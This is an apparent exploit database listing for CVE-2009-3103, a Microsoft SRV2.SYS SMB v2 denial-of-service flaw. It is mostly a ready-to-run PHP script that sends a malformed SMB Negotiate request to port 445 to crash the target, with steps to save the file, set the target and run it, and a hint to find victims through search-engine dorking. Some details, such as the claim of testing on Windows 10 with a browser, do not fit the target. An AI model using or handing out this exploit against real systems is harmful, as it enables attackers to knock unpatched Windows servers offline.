Microsoft SRV2.SYS SMB 2 Denial of Service

🗓️ 06 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 384 Views

Microsoft SRV2.SYS SMB v2 Denial of Service vulnerability detailed with PHP exploit code.

Reporter	Title	Published	Views	Family All 42
0day.today	Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit	26 Feb 201600:00	–	zdt
GithubExploit	Exploit for CVE-2009-3103	26 Jan 202607:13	–	githubexploit
Circl	CVE-2009-3103	9 Sep 200900:00	–	circl
Check Point Advisories	Microsoft Windows Server Remote Code Execution (CVE-2009-3103)	30 May 202100:00	–	checkpoint_advisories
Check Point Advisories	Microsoft Windows SMB Negotiate Request Remote Code Execution (CVE-2009-2532; CVE-2009-3103)	9 Sep 200900:00	–	checkpoint_advisories
CVE	CVE-2009-3103	8 Sep 200922:00	–	cve
Cvelist	CVE-2009-3103	8 Sep 200922:00	–	cvelist
Exploit DB	Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)	3 Jul 201000:00	–	exploitdb
Metasploit	Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference	15 Apr 201016:08	–	metasploit
Metasploit	Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference	15 Apr 201016:08	–	metasploit

=============================================================================================================================================
    | # Title     : Microsoft SRV2.SYS SMB v2 Denial of Service Vulnerability                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://Microsoft.com                                                                                                       |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is an exploit written in PHP that attempts to exploit a vulnerability in the SMB2 protocol found in Windows Vista, Windows 7, and Windows Server 2008. 
       
        The exploit relies on sending an SMB Negotiate request to the target with an invalid value in the Function Table which could result in a DoS or deeper exploitation of the vulnerability to obtain command execution.
    	
    	 ( Related : https://packetstorm.news/files/id/180562/  Related CVE Numbers: CVE-2009-3103  )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line  58 
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class SMBExploit {
        private $host;
        private $port;
        private $offset;
        private $socket;
    
        public function __construct($host, $port = 445, $offset = 0xffff) {
            $this->host = $host;
            $this->port = $port;
            $this->offset = $offset;
        }
    
        public function connect() {
            $this->socket = fsockopen($this->host, $this->port, $errno, $errstr, 5);
            if (!$this->socket) {
                die("Connection failed: $errstr ($errno)\n");
            }
            echo "Connected to {$this->host}:{$this->port}\n";
        }
    
        public function sendPayload() {
            $dialects = [
                "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a", 
                "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
            ];
            
            $data = "";
            foreach ($dialects as $dialect) {
                $data .= "\x02" . $dialect . "\x00";
            }
            
            $pkt = "\x00\x00\x00\x00"; // SMB header (simplified)
            $pkt .= "\xFFSMB"; // SMB Signature
            $pkt .= "\x72\x00\x00\x00\x18\x53\xC8"; // Negotiate Request
            $pkt .= pack("v", $this->offset); // ProcessIDHigh
            $pkt .= "\x00\x00\x00\x00"; // Extra fields
            $pkt .= $data;
            
            fwrite($this->socket, $pkt);
            echo "Payload sent, waiting for response...\n";
            
            $response = fread($this->socket, 1024);
            if (!$response) {
                echo "The target system has likely crashed.\n";
            } else {
                echo "Response received: " . bin2hex($response) . "\n";
            }
        }
    
        public function disconnect() {
            fclose($this->socket);
            echo "Disconnected.\n";
        }
    }
    
    $exploit = new SMBExploit("192.168.1.1");
    $exploit->connect();
    $exploit->sendPayload();
    $exploit->disconnect();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

06 Mar 2025 00:00Current

7.3High risk

Vulners AI Score7.3

CVSS 210

EPSS0.92861